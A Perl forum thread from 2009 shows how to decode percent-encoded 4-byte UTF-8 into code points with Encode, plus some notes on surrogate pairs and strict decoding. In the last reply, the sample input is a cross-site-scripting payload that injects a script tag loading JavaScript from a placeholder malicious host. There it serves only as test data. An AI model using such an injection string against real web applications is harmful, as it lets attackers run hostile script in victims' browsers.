converting UTF-8 to unicode hex with perl

Discussion in 'Perl Misc' started by FangQ, Jun 27, 2009.

  1. FangQ

    FangQ Guest

    I need to convert a UTF-8 encoded character to its corresponding
    Unicode code point. Because these characters are located in the range
    0x20000~0x2FFFF, my old approach, i.e. using Text::Iconv (from UTF-8
    to UCS-2), does not work anymore. Any better approach? (Converting to
    its surrogate pair is also fine.)

    As an example, the URL-encoded UTF-8 character (4 bytes) is
    "%F0%A1%BF%AA", and I want the output to be 0x21FEA.

    thanks in advance!
    FangQ, Jun 27, 2009
    #1

  2. On 2009-06-27 07:24, FangQ <> wrote:
    > I need to convert a UTF-8 encoded character to its corresponding
    > Unicode code point.


    Use the "decode" function.

    > Because these characters are located between
    > 0x20000~0x2FFFF, my old approach, i.e. using Text::Iconv
    > (from UTF-8 to UCS-2), does not work anymore. Any better approach?
    > (Converting to its surrogate pair is also fine.)


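    use Encode qw(decode);

    # $bytes holds the raw UTF-8 octets, e.g. "\xF0\xA1\xBF\xAA"
    my $characters = decode('UTF-8', $bytes);

    # print the code point of each decoded character in hex
    for (split(//, $characters)) {
        printf("%#x\n", ord);
    }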
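
The question starts from a percent-encoded string rather than raw octets, so one extra step is needed before decode() can be used. The following is a minimal sketch of the whole chain, assuming the input contains only well-formed %XX escapes; the helper name codepoints_from_url is hypothetical and does not come from the thread.

```perl
use strict;
use warnings;
use Encode qw(decode);

# Turn a percent-encoded UTF-8 string into a list of code points.
# codepoints_from_url() is a hypothetical helper name.
sub codepoints_from_url {
    my ($escaped) = @_;

    # Step 1: undo the percent-encoding; each %XX becomes one raw octet.
    (my $bytes = $escaped) =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;

    # Step 2: interpret the octets as UTF-8, yielding Perl characters.
    my $characters = decode('UTF-8', $bytes);

    # Step 3: ord() gives the Unicode code point of each character.
    return map { ord($_) } split //, $characters;
}

# The example from the question:
printf "0x%X\n", $_ for codepoints_from_url('%F0%A1%BF%AA');   # prints 0x21FEA
```

Because Perl characters are not limited to 16 bits, no UCS-2 style truncation occurs for code points above 0xFFFF.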

    hp
    Peter J. Holzer, Jun 27, 2009
    #2

  3. FangQ

    Guest

    On Sat, 27 Jun 2009 00:24:06 -0700 (PDT), FangQ <> wrote:

    >I need to convert a UTF-8 encoded character to its corresponding
    >Unicode code point. Because these characters are located between
    >0x20000~0x2FFFF, my old approach, i.e. using Text::Iconv
    >(from UTF-8 to UCS-2), does not work anymore. Any better approach?
    >(Converting to its surrogate pair is also fine.)
    >
    >As an example, the URL-encoded UTF-8 character (4 bytes) is
    >"%F0%A1%BF%AA", and I want the output to be 0x21FEA.
    >
    >thanks in advance!


    Something like below should help.

    -sln

    ------------------------
    use strict;
    use warnings;
    use Encode;
    binmode STDOUT, ':utf8';

    print "\n";

    my $tmp = "\x{21fea}";

    my $octets = encode ("utf8", $tmp);
    print "Encoded string:\n";
    print " length = ".length($octets)."\n";
    print " octets = $octets\n";
    print " URL val = ";
    for (split //, $octets) {
        printf ("%%%02X", ord($_));   # two hex digits per octet
    }
    print "\n\n";

    my $string = decode ("utf8", $octets);
    print "Decoded string:\n";
    print " length = ".length($string)."\n";
    print " string = $string\n";
    print " HEX val = ";
    for (split //, $string) {
        printf ("0x%X", ord($_));
    }
    print "\n";

    __END__

    Output:

    Encoded string:
     length = 4
     octets = ð¡¿ª
     URL val = %F0%A1%BF%AA

    Decoded string:
     length = 1
     string = 𡿪
     HEX val = 0x21FEA
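
The original question notes that a surrogate pair would also be acceptable. Once the code point is known, the UTF-16 pair follows from simple arithmetic: subtract 0x10000, then split the remaining 20 bits into two 10-bit halves. A minimal sketch, with surrogate_pair as a hypothetical helper name:

```perl
use strict;
use warnings;

# Split a supplementary-plane code point (U+10000..U+10FFFF) into its
# UTF-16 surrogate pair. surrogate_pair() is a hypothetical helper name.
sub surrogate_pair {
    my ($cp) = @_;
    die sprintf("U+%04X is not in the range U+10000..U+10FFFF\n", $cp)
        if $cp < 0x10000 || $cp > 0x10FFFF;

    my $offset = $cp - 0x10000;               # 20-bit value
    my $high   = 0xD800 + ($offset >> 10);    # top 10 bits
    my $low    = 0xDC00 + ($offset & 0x3FF);  # bottom 10 bits
    return ($high, $low);
}

printf "0x%X 0x%X\n", surrogate_pair(0x21FEA);   # prints 0xD847 0xDFEA
```

For 0x21FEA the offset is 0x11FEA, whose top ten bits are 0x47 and bottom ten bits are 0x3EA, which gives the pair 0xD847 0xDFEA.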
    , Jun 27, 2009
    #3
  4. FangQ

    FangQ Guest

    Thank you both for the quick response. I followed your examples and
    got the conversion working.


    Qianqian


    FangQ, Jun 27, 2009
    #4
  5. FangQ

    Guest

    On Sat, 27 Jun 2009 06:49:55 -0700 (PDT), FangQ <> wrote:

    >Thank you both for the quick response. I followed your examples and
    >got the conversion working.
    >
    >
    >Qianqian
    >
    >


    One last question. If you can't decode the URL with that module
    (because of the embedded 4-byte UTF-8), what are you using?

    -sln
    -----------------------------------
    use strict;
    use warnings;
    use Encode;
    binmode STDOUT, ':utf8';

    my $urlchrs = qr/[^\w.!~*'()]/; #URL unreserved chars (just a guess)

    my $url_encoded_sample = 'http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f
    www.badplace.com/nasty%F0%A1%BF%AA.js"></script>';
    # 4byte, UTF-8        ^^^^^^^^^^^^

    # test prints of URL encoded sample ...
    print "\nSample:\n$url_encoded_sample\n",'-'x20,"\n";
    print "\n", decodeURL( $url_encoded_sample ),"\n";
    print "\n", encodeURL( decodeURL( $url_encoded_sample ) ),"\n";
    print "\n", decodeURL( encodeURL( decodeURL( $url_encoded_sample ) ) ),"\n\n";

    # decoded UTF-8. values > 255 are shown as dynamic generated hex string (useless) ...
    for (split //, decode ('UTF-8', decodeURL( $url_encoded_sample ) )) {
        my $uchar = ord;
        if ($uchar > 255) {
            printf ("\\x{%X}", $uchar);
        } else {
            print;
        }
    }
    print "\n";
    exit 0;

    # subs ...
    sub decodeURL {
        my $bytes = shift;
        $bytes =~ s/%([0-9a-fA-F]{2})/ pack ("C", hex($1)) /ge; # octets 'C'
        return $bytes;
    }
    sub encodeURL {
        my $text = shift;
        $text =~ s/($urlchrs)/ sprintf ("%%%02X", ord($1)) /ge;
        return $text;
    }

    __END__

    Output:

    Sample:
    http://target/getdata.php?data=<script src="http://
    www.badplace.com/nasty𡿪.js"></script>
    --------------------

    http://target/getdata.php?data=<script src="http://
    www.badplace.com/nastyð¡¿ª.js"></script>

    http%3A%2F%2Ftarget%2Fgetdata.php%3Fdata%3D%3Cscript%20src%3D%22http%3A%2F%2F%0A
    www.badplace.com/nasty𡿪.js"></script>

    http://target/getdata.php?data=<script src="http://
    www.badplace.com/nastyð¡¿ª.js"></script>

    http://target/getdata.php?data=<script src="http://
    www.badplace.com/nasty\x{21FEA}.js"></script>
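
When the percent-encoded data comes from an untrusted URL, as in the sample above, it may help to reject octets that are not well-formed UTF-8 instead of decoding them leniently. The sketch below assumes the strict 'UTF-8' encoding name together with the Encode::FB_CROAK check value from the Encode module; the helper name decode_url_utf8 is hypothetical.

```perl
use strict;
use warnings;
use Encode qw(decode);

# Percent-decode, then decode strictly as UTF-8. Returns the character
# string, or undef if the octets are not well-formed UTF-8.
# decode_url_utf8() is a hypothetical helper name.
sub decode_url_utf8 {
    my ($escaped) = @_;
    (my $bytes = $escaped) =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;

    # FB_CROAK makes decode() die on malformed input instead of
    # substituting a replacement character; eval turns that into undef.
    my $chars = eval { decode('UTF-8', $bytes, Encode::FB_CROAK) };
    return $chars;
}

# First sample is complete; the second is missing the final octet %AA.
for my $sample ('nasty%F0%A1%BF%AA.js', 'nasty%F0%A1%BF.js') {
    my $chars = decode_url_utf8($sample);
    print "$sample: ",
        defined $chars ? length($chars) . " characters\n" : "malformed UTF-8\n";
}
```

The first sample decodes to nine characters (the four octets collapse into one), while the truncated second sample is reported as malformed.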
    , Jun 28, 2009
    #5
